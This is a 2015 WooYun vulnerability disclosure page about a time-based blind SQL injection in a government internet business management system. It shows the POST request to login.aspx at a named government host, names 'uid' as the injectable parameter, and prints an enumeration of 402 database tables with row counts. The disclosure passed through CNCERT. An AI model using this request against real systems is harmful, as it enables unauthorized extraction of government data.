当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113869

漏洞标题:某政府互联网业务管理系统SQL时间盲注

相关厂商:某通信管理局互联网业务管理系统

漏洞作者: 几何黑店

提交时间:2015-05-13 13:28

修复时间:2015-07-01 19:12

公开时间:2015-07-01 19:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-13: 细节已通知厂商并且等待厂商处理中
2015-05-17: 厂商已经确认,细节仅向厂商公开
2015-05-27: 细节向核心白帽子及相关领域专家公开
2015-06-06: 细节向普通白帽子公开
2015-06-16: 细节向实习白帽子公开
2015-07-01: 细节向公众公开

简要描述:

跑了一个礼拜,终于跑完402个表,最烦时间盲注了,啊啊啊

详细说明:

POST /login.aspx HTTP/1.1
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://aq.gdca.gov.cn:80/
Cookie: ASP.NET_SessionId=12tih045ujfxxj55wpq4giij; skyInstitute=Iwin; __CanGuestLog__=__myiWIN__=10; skyship=119253558; http://aq.gdca.gov.cnIWIN=119253558
Host: aq.gdca.gov.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
anyWhereLogin=true&ddlInstitute=true&pwd=&uid=1&val=


参数: uid

QQ图片20150513115709.png

漏洞证明:

QQ图片20150513115920.jpg


Database: gdca
[402 tables]
+---------------------------------------------+
| ACCESSARYISNRWPAGE |
| AccessorySet |
| AddrXX |
| Advertisement |
| AllSystemLog |
| AllSystemLsers |
| Answertable |
| ApplyFlow |
| ApplyItem |
| ApplyReply |
| ApplyRigh |
| ApplyRightHis䄄q䄄䄄A |
| ApplyRighyA |
| ApplyXX |
| Apply_Export |
| Apply_Expression |
| Apply_Search |
| Apply_keyvalue_formart |
| Asp_Info |
| Asp_Info_Copy |
| Asp_Items |
| Authorize |
| AutoNum |
| AutoNumLib |
| BBSXX |
| BDFlow |
| BDInformation |
| BDTemplate |
| BDXX |
| Banner |
| BasicGroup |
| BbsStatistics |
| BigExam |
| BookOrder |
| BugInfo |
| ButtonPosition |
| ButtonStyle |
| CHECK_LEGALFILE |
| CPNDITION_STYLE |
| Chart_Base |
| Chart_Series |
| ChatService |
| ChatXX |
| CityID |
| CompanyArchi |
| ComplexNoset |
| Cost_Basic |
| Cost_Log |
| Cost_SetMenu |
| CrossSystem |
| CustomOperate |
| CustomapecialQuery |
| DBFieldDicttion |
| DBWJFoum |
| DBWJInteFace |
| DZXX |
| DataInterface |
| DbOutRecLlqg |
| DbTableContentq |
| DomainBdxx |
| DynamCompute |
| DynamContentEx |
| DynamicRightInfo |
| DynamicSearch |
| DynamicSearchItem |
| EasyExcelImport |
| EmailBox |
| EmailPop3 |
| EmailServer |
| Emailserverperson |
| EnemyLog |
| Enjoin_User_Group |
| ExAns |
| ExHisMainE |
| ExHit |
| ExLibAns |
| ExLibQueA |
| ExMain |
| ExQue |
| ExSub |
| ExamHistory |
| Examtable |
| FAX_ILLe |
| FAX_LIST |
| FRIEND |
| Fax_AppRegist |
| FileCenterSet |
| FileHcon |
| FileHelp |
| FileKeyWord |
| FileManageSub |
| FileManagg |
| FirstMenu |
| FirstPagi |
| FlexibleWebPart |
| Flow |
| FlowAssoImport |
| FlowAssociateDomain |
| FlowAssociateSet |
| FlowAssocqate |
| FlowInterface |
| FlowLib |
| FlowLibMain |
| FlowLibState |
| FlowLog |
| FlowMain |
| FlowOutSend |
| FlowReshtCondition |
| FlowRtate |
| FlowUnlockSet |
| FormPasselBuildInfo |
| FormPasselBuildSet |
| ForumManager |
| FunctionState |
| Gantt_Base |
| Gantt_Item |
| Gantt_Projectq |
| GroupPolicy |
| GroupSign |
| GroupSignLog |
| GroupSistemaet |
| Group_talkDetail |
| Group_talk_history |
| HolidayCalendcr |
| IMSkin |
| IMSkinUse |
| INSTITUDE |
| ImageSlide |
| ImportPrivDocInfo |
| InfoXX |
| InnerMail |
| IwieCorporation |
| LailSF |
| LessonContent |
| LessonManager |
| LestStyleSet |
| Lest_ViewTypeSet |
| MOBILE_BASEOPERATE_SET |
| MOBILE_LOGIN_SET |
| MOBILE_MENU_SET |
| MOBILE_POP3RECaAIL_SET |
| MOBILE_RECEIVEOUTMAIL |
| MailXX |
| MarkTitlqC |
| MultiMenu |
| NodeBonusRecord |
| NodeDirectBonusRecord |
| NodeState |
| NodeStateDefiue |
| Nodes |
| OUTMaILCONNSET |
| OUtMailSended |
| Onclick |
| OnherSysLog |
| OutSysInteFaceSet |
| OutSysInteFayeList |
| OutSysLink |
| OutSysLinkValidatqA |
| OutSystemGetValue |
| PhotqOfIco |
| Posicy |
| PricesyBeg |
| PrintHistoryA |
| PrivDocSub |
| QXXX |
| REPORT_ALIEN |
| REPORT_COLLECT_SdYLE |
| REPORT_COLtECT |
| REPORT_EXPORT |
| REPORT_EXPORT_SETTING |
| REPORT_EXPORT_SETTING_SEARCH |
| REPORT_EXPORT_TYPE |
| REPORT_FETTING |
| REPORT_FUNCTION |
| REPORT_SOURCE |
| REPORT_STYLE |
| REPORT_STYLE_aPP |
| REPORT_SUMMARY |
| REPORT_URL |
| REPORT_aORMULA |
| REPORT_qASEaA |
| RZXX |
| RZXXback |
| RZfePolicy |
| RecEmqilList |
| Resortaetail |
| RightInfo |
| SKIN_BottomOperateArqa |
| SKIN_FPS_GeneralSettings |
| SKIN_IM |
| SKIN_MaIN |
| SKIN_Mark |
| SKIN_NEMaNDICOSaT |
| SKIN_NavigatioqArea_Main |
| SKIN_NavigutionArea_Button |
| SKIN_TopShorycutMenu |
| SKIN_wEMINDPAGESET |
| SMSUrlSend |
| Scan_confiya |
| Scan_frequency |
| Scan_item |
| Scan_remind |
| Scan_type |
| SelectExam |
| Semantic |
| ShareDoc |
| Sms |
| Sms1 |
| SmsFyiend |
| SmsHistory |
| SmsHistory1 |
| SmsItem |
| SmsMultiCoqtent |
| SmsSenqA |
| SmsUserSeqd |
| SmsUzeNote |
| SmsbultiNote |
| SmyrceHolidayCalendara |
| SourceWqekCalendar |
| StatReportInqo |
| Statistqc |
| SysGroupDomain |
| SystemPhoto |
| SystemRegister |
| SystemRelation |
| SystqmImport |
| SystqmImtiyeA |
| TempApplyTitle |
| Template |
| TemplateLibrary |
| ThirdMenu |
| TimeView_syave |
| TimeYiew_main |
| TransferMain |
| TransferRule |
| TraqsferDetqil |
| TreeItqm |
| Upaile |
| UpaileInfo |
| UppqrLimit |
| UpqrAuthorize |
| UserGroup |
| UseraoginFix |
| V_FileUpload_User |
| V_FileUplord_Path |
| V_MailSF |
| V_mailXX |
| ViewMenu |
| ViewSlave_ImportToMain |
| WBDB75 |
| WBDB75a |
| WBDB82 |
| WBDB85 |
| WBDB91 |
| WBDB94 |
| WEedAbT |
| WGIMGMARKSET |
| WasteBook |
| WasteBookForqaA |
| WasteBookItem |
| WasteBookSumItem |
| Widqet |
| WorkPress |
| WorkReply |
| WorkTime |
| WorkTrack |
| WorkTrackSet |
| XTXX |
| XTXX |
| XsetupA |
| YGXX |
| YHXX |
| ApplyRighyq{ruce |
| Bbsx}_c\?81sInfo |
| CONDITION_STYLE_GROqPa |
| CoopXX |
| Cost_SubentryA |
| CrmEmail |
| DomainSet |
| FPS_ButtoဆW鸁Fs |
| FileManageConfigInfo |
| FlowCondotion |
| FlowCust\?97mUrl |
| FlowResortY |
| FormLiurar| r! |
| Fsl~~mLmny |
| FuxwLl鐅~X=e_+{PV,89f}$|.:3<.!L6*hf+K0cG} |
| Group_talk |
| HTMLPolicy! |
| InterfaceSkin |
| LYXX |
| LessonExam |
| LessonT}pe |
| MOBILE_aAINSCREEN_SET |
| MainSystemRelation! |
| NoteXX! |
| PrivDoc |
| QZXX |
| REPORT_DROPeOWN |
| RecErbish_Config |
| RelativeFilq |
| SKIN_ColumnTab |
| SKIN_MainOpeyateAreaqApA |
| SKIN_NavigationArea_Sh~rtCutButon |
| SecondMenu! |
| SmsMultiNoteReceivers |
| SmsRqceive |
| SmsUserReceive |
| SmsViewQ |
| SmsView\ |
| SqurceObject) |
| SqurceOype
|
| SubjectClass! |
| TempGrouqA |
| TipMenu |
| Tree |
| TypeTable |
| UplHelpeㄅBa Q" |
| UploadaileLimit |
| UserPosition |
| UserRelation! |
| V_FileUpload_T}pe |
| V_notexx! |
| WBDB78!匇 |
| WBDB83A |
| WBDB84 |
| WBDB85팇ఇPQ a |
| WBDB85팇ఇ}@﬇xﴃy{*@0|a |
| WBDB93 |
| WGTitle |
| WasteBookSqowItem |
| WaterWeek! |
| Webatyle |
| WeekCaqndar |
| ZDXX |
| citytable |
| cysaroup |
| exportfile |
| inbox |
| outsiqeuser A |
| puqlicnotice! |
| sch_Schedule |
| surve}_answer |
| surve}_question |
| taq_DayRelation |
| web_for|h@1`AY<A |
| ws_EnqineMatch |
| yqbaysto\?81A%E9A'AQC# |
| alramLog |
| alramSet |
| applyMenuaist |
| attendance |
| backfile |
| backtask |
| baobiao |
| colleague |
| cpuntrytable |
| cysEryqrLog |
| defaultField |
| dtproperties |
| errorInfo |
| errorLog |
| errorProcess |
| excelimporttemp |
| file_table |
| filebook |
| firstpage_hb |
| formInfo |
| formLibInfo |
| formMenu |
| guest_register |
| imporysExcel |
| outbox |
| outer_asso_dtl |
| outer_asso_hdr |
| provincetable |
| sMSdistribute |
| sch_Note |
| sch_Relation |
| sch_Reqly |
| smallExam |
| smsBaseExpenditure |
| smsCat |
| smsMultiGroup |
| statReportDqtail |
| sys_info |
| sys_publicnotice |
| sys_web |
| tb_control |
| tb_history |
| tb_hueye |
| tb_schedule |
| vST |
| vdbResort |
| viewForm |
| viewSlaveForm |
| vqd |
| wastebqokFormIteqA |
| wgparyet |
| ws_Favorites |
| ws_Results |
| ws_Tasqs |
+---------------------------------------------+
Database: gdca
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.RZXX | 212632 |
| dbo.ApplyXX | 100661 |
| dbo.FlowAssoImport | 60336 |
| dbo.EnemyLog | 43921 |
| dbo.FlowLog | 34971 |
| dbo.ImportPrivDocInfo | 21734 |
| dbo.MailXX | 14532 |
| dbo.outbox | 14529 |
| dbo.UserGroup | 14110 |
| dbo.WBDB75 | 10622 |
| dbo.V_MailSF | 10000 |
| dbo.WBDB82 | 9945 |
| dbo.InnerMail | 9212 |
| dbo.sMSdistribute | 8203 |
| dbo.ApplyFlow | 6704 |
| dbo.colleague | 5866 |
| dbo.RightInfo | 5153 |
| dbo.OUtMailSended | 4322 |
| dbo.YHXX | 3008 |
| dbo.V_mailXX | 2000 |
| dbo.file_table | 1434 |
| dbo.ApplyItem | 871 |
| dbo.Scan_item | 757 |
| dbo.ThirdMenu | 720 |
| dbo.BDTemplate | 715 |
| dbo.Cost_Basic | 695 |
| dbo.formInfo | 691 |
| dbo.WBDB94 | 651 |
| dbo.defaultField | 594 |
| dbo.SmsHistory1 | 564 |
| dbo.WBDB85 | 541 |
| dbo.errorLog | 510 |
| dbo.REPORT_ALIEN | 507 |
| dbo.GroupSign | 467 |
| dbo.InfoXX | 396 |
| dbo.REPORT_SUMMARY | 342 |
| dbo.WasteBookItem | 342 |
| dbo.FlowMain | 310 |
| dbo.SystemPhoto | 258 |
| dbo.ws_Results | 242 |
| dbo.DynamicRightInfo | 239 |
| dbo.BasicGroup | 232 |
| dbo.SmsItem | 221 |
| dbo.vST | 198 |
| dbo.Flow | 186 |
| dbo.AddrXX | 179 |
| dbo.BDXX | 164 |
| dbo.outer_asso_dtl | 133 |
| dbo.ComplexNoset | 128 |
| dbo.V_FileUpload_User | 119 |
| dbo.outer_asso_hdr | 112 |
| dbo.viewSlaveForm | 96 |
| dbo.smsBaseExpenditure | 85 |
| dbo.WBDB91 | 82 |
| dbo.AutoNum | 75 |
| dbo.provincetable | 70 |
| dbo.WorkPress | 55 |
| dbo.EasyExcelImport | 53 |
| dbo.Cost_Log | 52 |
| dbo.REPORT_EXPORT_TYPE | 47 |
| dbo.NodeState | 41 |
| dbo.Semantic | 41 |
| dbo.viewForm | 40 |
| dbo.EmailServer | 38 |
| dbo.PrivDocSub | 38 |
| dbo.DZXX | 36 |
| dbo.CustomOperate | 32 |
| dbo.NodeBonusRecord | 24 |
| dbo.FirstMenu | 23 |
| dbo.excelimporttemp | 21 |
| dbo.IMSkinUse | 20 |
| dbo.Template | 19 |
| dbo.Asp_Info_Copy | 18 |
| dbo.WasteBook | 18 |
| dbo.BBSXX | 14 |
| dbo.Onclick | 13 |
| dbo.REPORT_SOURCE | 13 |
| dbo.AllSystemLog | 10 |
| dbo.firstpage_hb | 10 |
| dbo.SmsHistory | 10 |
| dbo.CompanyArchi | 9 |
| dbo.smsMultiGroup | 9 |
| dbo.WasteBookSumItem | 9 |
| dbo.Nodes | 8 |
| dbo.RZXXback | 8 |
| dbo.Apply_keyvalue_formart | 6 |
| dbo.Asp_Items | 5 |
| dbo.guest_register | 5 |
| dbo.TransferRule | 5 |
| dbo.[WBDB93] | 4 |
| dbo.MOBILE_MENU_SET | 4 |
| dbo.SystemRelation | 4 |
| dbo.WorkReply | 4 |
| dbo.ws_Favorites | 4 |
| dbo.ApplyReply | 3 |
| dbo.ButtonStyle | 3 |
| dbo.REPORT_URL | 3 |
| dbo.FileManageSub | 2 |
| dbo.ForumManager | 2 |
| dbo.INSTITUDE | 2 |
| dbo.Scan_frequency | 2 |
| dbo.Scan_remind | 2 |
| dbo.Scan_type | 2 |
| dbo.sys_publicnotice | 2 |
| dbo.vdbResort | 2 |
| dbo.[puqlicnotice!] | 1 |
| dbo.AccessorySet | 1 |
| dbo.Advertisement | 1 |
| dbo.alramSet | 1 |
| dbo.Asp_Info | 1 |
| dbo.Authorize | 1 |
| dbo.BookOrder | 1 |
| dbo.ChatService | 1 |
| dbo.ChatXX | 1 |
| dbo.DynamicSearchItem | 1 |
| dbo.EmailBox | 1 |
| dbo.Fax_AppRegist | 1 |
| dbo.FlexibleWebPart | 1 |
| dbo.formLibInfo | 1 |
| dbo.Group_talkDetail | 1 |
| dbo.GroupPolicy | 1 |
| dbo.IMSkin | 1 |
| dbo.MOBILE_BASEOPERATE_SET | 1 |
| dbo.MOBILE_LOGIN_SET | 1 |
| dbo.sch_Note | 1 |
| dbo.sch_Relation | 1 |
| dbo.SKIN_FPS_GeneralSettings | 1 |
| dbo.SKIN_IM | 1 |
| dbo.SKIN_MaIN | 1 |
| dbo.SKIN_Mark | 1 |
| dbo.sys_info | 1 |
| dbo.ViewMenu | 1 |
| dbo.WorkTime | 1 |
| dbo.WorkTrackSet | 1 |
| dbo.XTXX | 1 |
| dbo.XTXX | 1 |
+------------------------------+---------+

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-17 19:10

厂商回复:

已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-13 13:29 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    时间盲注,哈哈哈。